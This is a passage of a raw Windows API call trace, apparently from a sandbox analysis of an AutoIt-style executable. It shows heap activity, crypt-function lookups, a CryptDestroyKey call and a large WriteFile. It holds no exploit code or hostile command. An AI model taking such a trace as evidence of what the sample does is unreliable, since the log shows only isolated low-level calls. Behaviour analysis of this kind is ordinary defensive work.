hHeap=0x970000) returned 1 [0187.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3c072a8 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0187.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3c1abd8 [0187.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c072a8 | out: hHeap=0x970000) returned 1 [0187.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0187.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.014] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0187.014] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.014] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0187.014] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0187.016] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0187.016] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0187.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0187.017] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0187.017] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3c072a8 [0187.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3c2e508 [0187.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c072a8 | out: hHeap=0x970000) returned 1 [0187.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3c072a8 [0187.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c2e508 | out: hHeap=0x970000) returned 1 [0187.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13928) returned 0x3c2e508 [0187.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c072a8 | out: hHeap=0x970000) returned 1 [0187.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0187.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0187.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.164] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f37948*, nNumberOfBytesToWrite=0x13928, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f37948*, lpNumberOfBytesWritten=0x8cf5e4*=0x13928, lpOverlapped=0x0) returned 1 [0187.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0187.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0187.168] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.168] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.169] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0187.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0187.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0187.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.169] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0187.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.170] CryptDestroyKey (hKey=0xa87290) returned 1 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0187.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 